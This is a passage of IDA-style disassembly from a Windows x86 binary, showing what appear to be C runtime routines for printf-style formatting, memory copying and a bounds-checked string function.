movsx eax, dl ; jumptable 00406B79 case 7
cmp eax, 64h
jg loc_406ED9
jz loc_406F58
cmp eax, 53h
jg loc_406E21
jz short loc_406DD2
sub eax, 41h
jz short loc_406D8D
dec eax
dec eax
jz short loc_406DC1
dec eax
dec eax
jz short loc_406D8D
dec eax
dec eax
jnz loc_4071DC
loc_406D8D: ; CODE XREF: sub_4069D7+3A4�j
; sub_4069D7+3AC�j
add dl, 20h
mov [ebp+1F8h+var_270], 1
mov [ebp+1F8h+var_211], dl
loc_406D9A: ; CODE XREF: sub_4069D7+459�j
; sub_4069D7+51D�j
or [ebp+1F8h+var_210], 40h
cmp [ebp+1F8h+var_218], esi
lea ebx, [ebp+1F8h+var_20C]
mov eax, 200h
mov [ebp+1F8h+var_21C], ebx
mov [ebp+1F8h+var_260], eax
jge loc_406F7C
mov [ebp+1F8h+var_218], 6
jmp loc_406FCA
; ---------------------------------------------------------------------------
loc_406DC1: ; CODE XREF: sub_4069D7+3A8�j
test word ptr [ebp+1F8h+var_210], 830h
jnz short loc_406E3E
or [ebp+1F8h+var_210], 800h
jmp short loc_406E3E
; ---------------------------------------------------------------------------
loc_406DD2: ; CODE XREF: sub_4069D7+39F�j
test word ptr [ebp+1F8h+var_210], 830h
jnz short loc_406DE1
or [ebp+1F8h+var_210], 800h
loc_406DE1: ; CODE XREF: sub_4069D7+401�j
; sub_4069D7+694�j
mov ecx, [ebp+1F8h+var_218]
cmp ecx, 0FFFFFFFFh
jnz short loc_406DEE
mov ecx, 7FFFFFFFh
loc_406DEE: ; CODE XREF: sub_4069D7+410�j
add edi, 4
test word ptr [ebp+1F8h+var_210], 810h
mov [ebp+1F8h+var_224], edi
mov edi, [edi-4]
mov [ebp+1F8h+var_21C], edi
jz loc_4071BA
cmp edi, esi
jnz short loc_406E12
mov eax, ds:off_423928
mov [ebp+1F8h+var_21C], eax
loc_406E12: ; CODE XREF: sub_4069D7+431�j
mov eax, [ebp+1F8h+var_21C]
mov [ebp+1F8h+var_23C], 1
jmp loc_4071AF
; ---------------------------------------------------------------------------
loc_406E21: ; CODE XREF: sub_4069D7+399�j
sub eax, 58h
jz loc_407063
dec eax
dec eax
jz short loc_406E8B
sub eax, ecx
jz loc_406D9A
dec eax
dec eax
jnz loc_4071DC
loc_406E3E: ; CODE XREF: sub_4069D7+3F0�j
; sub_4069D7+3F9�j
add edi, 4
test word ptr [ebp+1F8h+var_210], 810h
mov [ebp+1F8h+var_224], edi
jz short loc_406E73
movzx eax, word ptr [edi-4]
push eax
push 200h
lea eax, [ebp+1F8h+var_20C]
push eax
lea eax, [ebp+1F8h+var_220]
push eax
call sub_40D732
add esp, 10h
test eax, eax
jz short loc_406E80
mov [ebp+1F8h+var_248], 1
jmp short loc_406E80
; ---------------------------------------------------------------------------
loc_406E73: ; CODE XREF: sub_4069D7+473�j
mov al, [edi-4]
mov [ebp+1F8h+var_20C], al
mov [ebp+1F8h+var_220], 1
loc_406E80: ; CODE XREF: sub_4069D7+491�j
; sub_4069D7+49A�j
lea eax, [ebp+1F8h+var_20C]
mov [ebp+1F8h+var_21C], eax
jmp loc_4071DC
; ---------------------------------------------------------------------------
loc_406E8B: ; CODE XREF: sub_4069D7+455�j
mov eax, [edi]
add edi, 4
cmp eax, esi
mov [ebp+1F8h+var_224], edi
jz short loc_406EC5
mov ecx, [eax+4]
cmp ecx, esi
jz short loc_406EC5
test word ptr [ebp+1F8h+var_210], 800h
movsx eax, word ptr [eax]
mov [ebp+1F8h+var_21C], ecx
jz short loc_406EBD
cdq
sub eax, edx
sar eax, 1
mov [ebp+1F8h+var_23C], 1
jmp loc_4071D9
; ---------------------------------------------------------------------------
loc_406EBD: ; CODE XREF: sub_4069D7+4D3�j
mov [ebp+1F8h+var_23C], esi
jmp loc_4071D9
; ---------------------------------------------------------------------------
loc_406EC5: ; CODE XREF: sub_4069D7+4BE�j
; sub_4069D7+4C5�j
mov eax, ds:off_423924
mov [ebp+1F8h+var_21C], eax
push eax
loc_406ECE: ; CODE XREF: sub_4069D7+680�j
call sub_404130
pop ecx
jmp loc_4071D9
; ---------------------------------------------------------------------------
loc_406ED9: ; CODE XREF: sub_4069D7+38A�j
cmp eax, 70h
jg loc_407068
jz loc_40705C
cmp eax, 65h
jl loc_4071DC
cmp eax, 67h
jle loc_406D9A
cmp eax, 69h
jz short loc_406F58
cmp eax, 6Eh
jz short loc_406F23
cmp eax, 6Fh
jnz loc_4071DC
test byte ptr [ebp+1F8h+var_210], 80h
mov [ebp+1F8h+var_220], 8
jz short loc_406F63
or [ebp+1F8h+var_210], 200h
jmp short loc_406F63
; ---------------------------------------------------------------------------
loc_406F23: ; CODE XREF: sub_4069D7+52B�j
mov esi, [edi]
add edi, 4
mov [ebp+1F8h+var_224], edi
call sub_40D5BD
test eax, eax
jz loc_40730D
test byte ptr [ebp+1F8h+var_210], 20h
jz short loc_406F47
mov ax, word ptr [ebp+1F8h+var_22C]
mov [esi], ax
jmp short loc_406F4C
; ---------------------------------------------------------------------------
loc_406F47: ; CODE XREF: sub_4069D7+565�j
mov eax, [ebp+1F8h+var_22C]
mov [esi], eax
loc_406F4C: ; CODE XREF: sub_4069D7+56E�j
mov [ebp+1F8h+var_248], 1
jmp loc_4072E1
; ---------------------------------------------------------------------------
loc_406F58: ; CODE XREF: sub_4069D7+390�j
; sub_4069D7+526�j
or [ebp+1F8h+var_210], 40h
loc_406F5C: ; CODE XREF: sub_4069D7+69C�j
mov [ebp+1F8h+var_220], 0Ah
loc_406F63: ; CODE XREF: sub_4069D7+541�j
; sub_4069D7+54A�j ...
mov ecx, [ebp+1F8h+var_210]
test cx, cx
jns loc_4070B2
loc_406F6F: ; CODE XREF: sub_4069D7+6E0�j
mov eax, [edi]
mov edx, [edi+4]
add edi, 8
jmp loc_4070E7
; ---------------------------------------------------------------------------
loc_406F7C: ; CODE XREF: sub_4069D7+3D8�j
jnz short loc_406F8C
cmp dl, 67h
jnz short loc_406FCA
mov [ebp+1F8h+var_218], 1
jmp short loc_406FCA
; ---------------------------------------------------------------------------
loc_406F8C: ; CODE XREF: sub_4069D7:loc_406F7C�j
cmp [ebp+1F8h+var_218], eax
jle short loc_406F94
mov [ebp+1F8h+var_218], eax
loc_406F94: ; CODE XREF: sub_4069D7+5B8�j
cmp [ebp+1F8h+var_218], 0A3h
jle short loc_406FCA
mov esi, [ebp+1F8h+var_218]
add esi, 15Dh
push esi
call sub_40773A
test eax, eax
mov dl, [ebp+1F8h+var_211]
pop ecx
mov [ebp+1F8h+var_24C], eax
jz short loc_406FC1
mov [ebp+1F8h+var_21C], eax
mov [ebp+1F8h+var_260], esi
mov ebx, eax
jmp short loc_406FC8
; ---------------------------------------------------------------------------
loc_406FC1: ; CODE XREF: sub_4069D7+5DE�j
mov [ebp+1F8h+var_218], 0A3h
loc_406FC8: ; CODE XREF: sub_4069D7+5E8�j
xor esi, esi
loc_406FCA: ; CODE XREF: sub_4069D7+3E5�j
; sub_4069D7+5AA�j ...
mov eax, [edi]
add edi, 8
mov [ebp+1F8h+var_278], eax
mov eax, [edi-4]
mov [ebp+1F8h+var_274], eax
lea eax, [ebp+1F8h+var_25C]
push eax
push [ebp+1F8h+var_270]
movsx eax, dl
push [ebp+1F8h+var_218]
mov [ebp+1F8h+var_224], edi
push eax
push [ebp+1F8h+var_260]
lea eax, [ebp+1F8h+var_278]
push ebx
push eax
push ds:off_423F98
call sub_405193
pop ecx
call eax
mov edi, [ebp+1F8h+var_210]
add esp, 1Ch
and edi, 80h
jz short loc_407027
cmp [ebp+1F8h+var_218], esi
jnz short loc_407027
lea eax, [ebp+1F8h+var_25C]
push eax
push ebx
push ds:off_423FA4
call sub_405193
pop ecx
call eax
pop ecx
pop ecx
loc_407027: ; CODE XREF: sub_4069D7+634�j
; sub_4069D7+639�j
cmp [ebp+1F8h+var_211], 67h
jnz short loc_407046
cmp edi, esi
jnz short loc_407046
lea eax, [ebp+1F8h+var_25C]
push eax
push ebx
push ds:off_423FA0
call sub_405193
pop ecx
call eax
pop ecx
pop ecx
loc_407046: ; CODE XREF: sub_4069D7+654�j
; sub_4069D7+658�j
cmp byte ptr [ebx], 2Dh
jnz short loc_407056
or [ebp+1F8h+var_210], 100h
inc ebx
mov [ebp+1F8h+var_21C], ebx
loc_407056: ; CODE XREF: sub_4069D7+672�j
push ebx
jmp loc_406ECE
; ---------------------------------------------------------------------------
loc_40705C: ; CODE XREF: sub_4069D7+50B�j
mov [ebp+1F8h+var_218], 8
loc_407063: ; CODE XREF: sub_4069D7+44D�j
mov [ebp+1F8h+var_244], ecx
jmp short loc_407089
; ---------------------------------------------------------------------------
loc_407068: ; CODE XREF: sub_4069D7+505�j
sub eax, 73h
jz loc_406DE1
dec eax
dec eax
jz loc_406F5C
sub eax, 3
jnz loc_4071DC
mov [ebp+1F8h+var_244], 27h
loc_407089: ; CODE XREF: sub_4069D7+68F�j
test byte ptr [ebp+1F8h+var_210], 80h
mov [ebp+1F8h+var_220], 10h
jz loc_406F63
mov al, byte ptr [ebp+1F8h+var_244]
add al, 51h
mov [ebp+1F8h+var_230], 30h
mov [ebp+1F8h+var_22F], al
mov [ebp+1F8h+var_234], 2
jmp loc_406F63
; ---------------------------------------------------------------------------
loc_4070B2: ; CODE XREF: sub_4069D7+592�j
test cx, 1000h
jnz loc_406F6F
add edi, 4
test cl, 20h
jz short loc_4070DA
test cl, 40h
mov [ebp+1F8h+var_224], edi
jz short loc_4070D3
movsx eax, word ptr [edi-4]
jmp short loc_4070D7
; ---------------------------------------------------------------------------
loc_4070D3: ; CODE XREF: sub_4069D7+6F4�j
movzx eax, word ptr [edi-4]
loc_4070D7: ; CODE XREF: sub_4069D7+6FA�j
cdq
jmp short loc_4070EA
; ---------------------------------------------------------------------------
loc_4070DA: ; CODE XREF: sub_4069D7+6EC�j
test cl, 40h
mov eax, [edi-4]
jz short loc_4070E5
cdq
jmp short loc_4070E7
; ---------------------------------------------------------------------------
loc_4070E5: ; CODE XREF: sub_4069D7+709�j
xor edx, edx
loc_4070E7: ; CODE XREF: sub_4069D7+5A0�j
; sub_4069D7+70C�j
mov [ebp+1F8h+var_224], edi
loc_4070EA: ; CODE XREF: sub_4069D7+701�j
test cl, 40h
jz short loc_407107
cmp edx, esi
jg short loc_407107
jl short loc_4070F9
cmp eax, esi
jnb short loc_407107
loc_4070F9: ; CODE XREF: sub_4069D7+71C�j
neg eax
adc edx, 0
neg edx
or [ebp+1F8h+var_210], 100h
loc_407107: ; CODE XREF: sub_4069D7+716�j
; sub_4069D7+71A�j ...
test word ptr [ebp+1F8h+var_210], 9000h
mov ebx, edx
mov edi, eax
jnz short loc_407115
xor ebx, ebx
loc_407115: ; CODE XREF: sub_4069D7+73A�j
cmp [ebp+1F8h+var_218], 0
jge short loc_407124
mov [ebp+1F8h+var_218], 1
jmp short loc_407135
; ---------------------------------------------------------------------------
loc_407124: ; CODE XREF: sub_4069D7+742�j
and [ebp+1F8h+var_210], 0FFFFFFF7h
mov eax, 200h
cmp [ebp+1F8h+var_218], eax
jle short loc_407135
mov [ebp+1F8h+var_218], eax
loc_407135: ; CODE XREF: sub_4069D7+74B�j
; sub_4069D7+759�j
mov eax, edi
or eax, ebx
jnz short loc_40713F
and [ebp+1F8h+var_234], 0
loc_40713F: ; CODE XREF: sub_4069D7+762�j
lea esi, [ebp+1F8h+var_D]
loc_407145: ; CODE XREF: sub_4069D7+7A0�j
mov eax, [ebp+1F8h+var_218]
dec [ebp+1F8h+var_218]
test eax, eax
jg short loc_407155
mov eax, edi
or eax, ebx
jz short loc_407179
loc_407155: ; CODE XREF: sub_4069D7+776�j
mov eax, [ebp+1F8h+var_220]
cdq
push edx
push eax
push ebx
push edi
call sub_40D750
add ecx, 30h
cmp ecx, 39h
mov [ebp+1F8h+var_260], ebx
mov edi, eax
mov ebx, edx
jle short loc_407174
add ecx, [ebp+1F8h+var_244]
loc_407174: ; CODE XREF: sub_4069D7+798�j
mov [esi], cl
dec esi
jmp short loc_407145
; ---------------------------------------------------------------------------
loc_407179: ; CODE XREF: sub_4069D7+77C�j
lea eax, [ebp+1F8h+var_D]
sub eax, esi
inc esi
test word ptr [ebp+1F8h+var_210], 200h
mov [ebp+1F8h+var_220], eax
mov [ebp+1F8h+var_21C], esi
jz short loc_4071DC
test eax, eax
jz short loc_40719B
mov ecx, esi
cmp byte ptr [ecx], 30h
jz short loc_4071DC
loc_40719B: ; CODE XREF: sub_4069D7+7BB�j
dec [ebp+1F8h+var_21C]
mov ecx, [ebp+1F8h+var_21C]
mov byte ptr [ecx], 30h
inc eax
jmp short loc_4071D9
; ---------------------------------------------------------------------------
loc_4071A7: ; CODE XREF: sub_4069D7+7DA�j
dec ecx
cmp [eax], si
jz short loc_4071B3
inc eax
inc eax
loc_4071AF: ; CODE XREF: sub_4069D7+445�j
cmp ecx, esi
jnz short loc_4071A7
loc_4071B3: ; CODE XREF: sub_4069D7+7D4�j
sub eax, [ebp+1F8h+var_21C]
sar eax, 1
jmp short loc_4071D9
; ---------------------------------------------------------------------------
loc_4071BA: ; CODE XREF: sub_4069D7+429�j
cmp edi, esi
jnz short loc_4071C6
mov eax, ds:off_423924
mov [ebp+1F8h+var_21C], eax
loc_4071C6: ; CODE XREF: sub_4069D7+7E5�j
mov eax, [ebp+1F8h+var_21C]
jmp short loc_4071D2
; ---------------------------------------------------------------------------
loc_4071CB: ; CODE XREF: sub_4069D7+7FD�j
dec ecx
cmp byte ptr [eax], 0
jz short loc_4071D6
inc eax
loc_4071D2: ; CODE XREF: sub_4069D7+7F2�j
cmp ecx, esi
jnz short loc_4071CB
loc_4071D6: ; CODE XREF: sub_4069D7+7F8�j
sub eax, [ebp+1F8h+var_21C]
loc_4071D9: ; CODE XREF: sub_4069D7+4E1�j
; sub_4069D7+4E9�j ...
mov [ebp+1F8h+var_220], eax
loc_4071DC: ; CODE XREF: sub_4069D7+3B0�j
; sub_4069D7+461�j ...
cmp [ebp+1F8h+var_248], 0
jnz loc_4072E1
mov eax, [ebp+1F8h+var_210]
test al, 40h
jz short loc_407212
test ax, 100h
jz short loc_4071F9
mov [ebp+1F8h+var_230], 2Dh
jmp short loc_40720B
; ---------------------------------------------------------------------------
loc_4071F9: ; CODE XREF: sub_4069D7+81A�j
test al, 1
jz short loc_407203
mov [ebp+1F8h+var_230], 2Bh
jmp short loc_40720B
; ---------------------------------------------------------------------------
loc_407203: ; CODE XREF: sub_4069D7+824�j
test al, 2
jz short loc_407212
mov [ebp+1F8h+var_230], 20h
loc_40720B: ; CODE XREF: sub_4069D7+820�j
; sub_4069D7+82A�j
mov [ebp+1F8h+var_234], 1
loc_407212: ; CODE XREF: sub_4069D7+814�j
; sub_4069D7+82E�j
mov ebx, [ebp+1F8h+var_238]
sub ebx, [ebp+1F8h+var_220]
sub ebx, [ebp+1F8h+var_234]
test byte ptr [ebp+1F8h+var_210], 0Ch
jnz short loc_407232
push [ebp+1F8h+var_228]
lea eax, [ebp+1F8h+var_22C]
push ebx
push 20h
call sub_406969
add esp, 0Ch
loc_407232: ; CODE XREF: sub_4069D7+848�j
push [ebp+1F8h+var_234]
mov edi, [ebp+1F8h+var_228]
lea eax, [ebp+1F8h+var_22C]
lea ecx, [ebp+1F8h+var_230]
call sub_40698D
test byte ptr [ebp+1F8h+var_210], 8
pop ecx
jz short loc_40725F
test byte ptr [ebp+1F8h+var_210], 4
jnz short loc_40725F
push edi
push ebx
push 30h
lea eax, [ebp+1F8h+var_22C]
call sub_406969
add esp, 0Ch
loc_40725F: ; CODE XREF: sub_4069D7+871�j
; sub_4069D7+877�j
cmp [ebp+1F8h+var_23C], 0
mov eax, [ebp+1F8h+var_220]
jz short loc_4072B9
test eax, eax
jle short loc_4072B9
mov esi, [ebp+1F8h+var_21C]
mov [ebp+1F8h+var_260], eax
loc_407272: ; CODE XREF: sub_4069D7+8D8�j
movzx eax, word ptr [esi]
dec [ebp+1F8h+var_260]
push eax
push 6
lea eax, [ebp+1F8h+var_C]
push eax
lea eax, [ebp+1F8h+var_268]
inc esi
push eax
inc esi
call sub_40D732
add esp, 10h
test eax, eax
jnz short loc_4072B3
cmp [ebp+1F8h+var_268], eax
jz short loc_4072B3
push [ebp+1F8h+var_268]
lea eax, [ebp+1F8h+var_22C]
lea ecx, [ebp+1F8h+var_C]
call sub_40698D
cmp [ebp+1F8h+var_260], 0
pop ecx
jnz short loc_407272
jmp short loc_4072C6
; ---------------------------------------------------------------------------
loc_4072B3: ; CODE XREF: sub_4069D7+8BB�j
; sub_4069D7+8C0�j
or [ebp+1F8h+var_22C], 0FFFFFFFFh
jmp short loc_4072C6
; ---------------------------------------------------------------------------
loc_4072B9: ; CODE XREF: sub_4069D7+88F�j
; sub_4069D7+893�j
mov ecx, [ebp+1F8h+var_21C]
push eax
lea eax, [ebp+1F8h+var_22C]
call sub_40698D
pop ecx
loc_4072C6: ; CODE XREF: sub_4069D7+8DA�j
; sub_4069D7+8E0�j
cmp [ebp+1F8h+var_22C], 0
jl short loc_4072E1
test byte ptr [ebp+1F8h+var_210], 4
jz short loc_4072E1
push edi
push ebx
push 20h
lea eax, [ebp+1F8h+var_22C]
call sub_406969
add esp, 0Ch
loc_4072E1: ; CODE XREF: sub_4069D7+57C�j
; sub_4069D7+809�j ...
cmp [ebp+1F8h+var_24C], 0
jz short loc_4072F4 ; default
push [ebp+1F8h+var_24C]
call sub_403603
and [ebp+1F8h+var_24C], 0
pop ecx
loc_4072F4: ; CODE XREF: sub_4069D7+19C�j
; sub_4069D7+1BF�j ...
mov ebx, [ebp+1F8h+var_240] ; default
mov al, [ebx]
test al, al
mov [ebp+1F8h+var_211], al
jz short loc_407324
mov ecx, [ebp+1F8h+var_26C]
mov edi, [ebp+1F8h+var_224]
mov dl, al
jmp loc_406B35
; ---------------------------------------------------------------------------
loc_40730D: ; CODE XREF: sub_4069D7+36E�j
; sub_4069D7+55B�j
call sub_4057D3
mov dword ptr [eax], 16h
xor eax, eax
push eax
push eax
push eax
push eax
push eax
jmp loc_406A47
; ---------------------------------------------------------------------------
loc_407324: ; CODE XREF: sub_4069D7+158�j
; sub_4069D7+166�j ...
cmp [ebp+1F8h+var_250], 0
jz short loc_407331
mov eax, [ebp+1F8h+var_254]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_407331: ; CODE XREF: sub_4069D7+951�j
mov eax, [ebp+1F8h+var_22C]
loc_407334: ; CODE XREF: sub_4069D7+88�j
mov ecx, [ebp+1F8h+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 1F8h
leave
retn
sub_4069D7 endp
; ---------------------------------------------------------------------------
db 8Dh, 49h, 0
off_40734F dd offset loc_406D19 ; DATA XREF: sub_4069D7+1A2�r
dd offset loc_406B80 ; jump table for switch statement
dd offset loc_406B9B
dd offset loc_406BEA
dd offset loc_406C24
dd offset loc_406C2C
dd offset loc_406C63
dd offset loc_406D5B
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407370 proc near ; CODE XREF: sub_402BA0+4D�p
; sub_405B50+2DA�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_407390
cmp edi, eax
jb loc_407534
loc_407390: ; CODE XREF: sub_407370+16�j
cmp ecx, 100h
jb short loc_4073B7
cmp ds:dword_433C7C, 0
jz short loc_4073B7
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jnz short loc_4073B7
pop esi
pop edi
pop ebp
jmp sub_40D86C
; ---------------------------------------------------------------------------
loc_4073B7: ; CODE XREF: sub_407370+26�j
; sub_407370+2F�j ...
test edi, 3
jnz short loc_4073D4
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4073F4
rep movsd
jmp off_4074E4[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_4073D4: ; CODE XREF: sub_407370+4D�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_4073EC
and eax, 3
add ecx, eax
jmp dword ptr loc_4073F4+4[eax*4]
; ---------------------------------------------------------------------------
loc_4073EC: ; CODE XREF: sub_407370+6E�j
jmp dword ptr loc_4074F4[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4073F4: ; CODE XREF: sub_407370+58�j
; sub_407370+B6�j ...
jmp off_407478[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_407408
dd offset loc_407434
dd offset loc_407458
; ---------------------------------------------------------------------------
loc_407408: ; DATA XREF: sub_407370+8C�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_4073F4
rep movsd
jmp off_4074E4[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_407434: ; DATA XREF: sub_407370+90�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_4073F4
rep movsd
jmp off_4074E4[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_407458: ; DATA XREF: sub_407370+94�o
and edx, ecx
mov al, [esi]
mov [edi], al
add esi, 1
shr ecx, 2
add edi, 1
cmp ecx, 8
jb short loc_4073F4
rep movsd
jmp off_4074E4[edx*4]
; ---------------------------------------------------------------------------
align 4
off_407478 dd offset loc_4074DB ; DATA XREF: sub_407370:loc_4073F4�r
dd offset loc_4074C8
dd offset loc_4074C0
dd offset loc_4074B8
dd offset loc_4074B0
dd offset loc_4074A8
dd offset loc_4074A0
dd offset loc_407498
; ---------------------------------------------------------------------------
loc_407498: ; CODE XREF: sub_407370:loc_4073F4�j
; DATA XREF: sub_407370+124�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_4074A0: ; CODE XREF: sub_407370:loc_4073F4�j
; DATA XREF: sub_407370+120�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_4074A8: ; CODE XREF: sub_407370:loc_4073F4�j
; DATA XREF: sub_407370+11C�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_4074B0: ; CODE XREF: sub_407370:loc_4073F4�j
; DATA XREF: sub_407370+118�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_4074B8: ; CODE XREF: sub_407370:loc_4073F4�j
; DATA XREF: sub_407370+114�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_4074C0: ; CODE XREF: sub_407370:loc_4073F4�j
; DATA XREF: sub_407370+110�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_4074C8: ; CODE XREF: sub_407370:loc_4073F4�j
; DATA XREF: sub_407370+10C�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4074DB: ; CODE XREF: sub_407370:loc_4073F4�j
; DATA XREF: sub_407370:off_407478�o
jmp off_4074E4[edx*4]
; ---------------------------------------------------------------------------
align 4
off_4074E4 dd offset loc_4074F4 ; DATA XREF: sub_407370+5C�r
; sub_407370+BA�r ...
dd offset loc_4074FC
dd offset loc_407508
dd offset loc_40751C
; ---------------------------------------------------------------------------
loc_4074F4: ; CODE XREF: sub_407370+5C�j
; sub_407370+BA�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4074FC: ; CODE XREF: sub_407370+5C�j
; sub_407370+BA�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407508: ; CODE XREF: sub_407370+5C�j
; sub_407370+BA�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_40751C: ; CODE XREF: sub_407370+5C�j
; sub_407370+BA�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407534: ; CODE XREF: sub_407370+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_407568
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_40755C
std
rep movsd
cld
jmp off_407680[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_40755C: ; CODE XREF: sub_407370+1DD�j
; sub_407370+238�j ...
neg ecx
jmp off_407630[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_407568: ; CODE XREF: sub_407370+1D2�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_407580
and eax, 3
sub ecx, eax
jmp dword ptr loc_407580+4[eax*4]
; ---------------------------------------------------------------------------
loc_407580: ; CODE XREF: sub_407370+202�j
; DATA XREF: sub_407370+209�r
jmp off_407680[ecx*4]
; ---------------------------------------------------------------------------
align 4
xchg eax, esp
jnz short loc_4075CB
add [eax-1FFFBF8Bh], bh
jnz short near ptr loc_4075D1+2
add [edx-2EDCFCBAh], cl
mov [edi+3], al
sub esi, 1
shr ecx, 2
sub edi, 1
cmp ecx, 8
jb short loc_40755C
std
rep movsd
cld
jmp off_407680[edx*4]
; ---------------------------------------------------------------------------
align 4
dd 2303468Ah, 34788D1h, 0C102468Ah, 478802E9h
db 2, 83h, 0EEh
; ---------------------------------------------------------------------------
loc_4075CB: ; CODE XREF: sub_407370+219�j
add al, [ebx-67CFD11h]
loc_4075D1: ; CODE XREF: sub_407370+221�j
or [edx-78h], dh
std
rep movsd
cld
jmp off_407680[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_40755C
std
rep movsd
cld
jmp off_407680[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_407634
dd offset loc_40763C
dd offset loc_407644
dd offset loc_40764C
dd offset loc_407654
dd offset loc_40765C
dd offset loc_407664
off_407630 dd offset loc_407677 ; DATA XREF: sub_407370+1EE�r
; ---------------------------------------------------------------------------
loc_407634: ; DATA XREF: sub_407370+2A4�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_40763C: ; DATA XREF: sub_407370+2A8�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_407644: ; DATA XREF: sub_407370+2AC�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_40764C: ; DATA XREF: sub_407370+2B0�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_407654: ; DATA XREF: sub_407370+2B4�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_40765C: ; DATA XREF: sub_407370+2B8�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_407664: ; DATA XREF: sub_407370+2BC�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_407677: ; CODE XREF: sub_407370+1EE�j
; DATA XREF: sub_407370:off_407630�o
jmp off_407680[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_407680 dd offset loc_407690 ; DATA XREF: sub_407370+1E3�r
; sub_407370:loc_407580�r ...
dd offset loc_407698
dd offset loc_4076A8
dd offset loc_4076BC
; ---------------------------------------------------------------------------
loc_407690: ; CODE XREF: sub_407370+1E3�j
; sub_407370:loc_407580�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407698: ; CODE XREF: sub_407370+1E3�j
; sub_407370:loc_407580�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4076A8: ; CODE XREF: sub_407370+1E3�j
; sub_407370:loc_407580�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4076BC: ; CODE XREF: sub_407370+1E3�j
; sub_407370:loc_407580�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_407370 endp
; =============== S U B R O U T I N E =======================================
sub_4076D5 proc near ; CODE XREF: sub_402C0C+31�p
; sub_402C72+3D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_0]
push ebx
xor ebx, ebx
cmp ecx, ebx
push esi
push edi
jz short loc_4076EA
mov edi, [esp+0Ch+arg_4]
cmp edi, ebx
ja short loc_407705
loc_4076EA: ; CODE XREF: sub_4076D5+B�j
; sub_4076D5+3A�j
call sub_4057D3
push 16h
pop esi
mov [eax], esi
loc_4076F4: ; CODE XREF: sub_4076D5+5D�j
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402F39
add esp, 14h
mov eax, esi
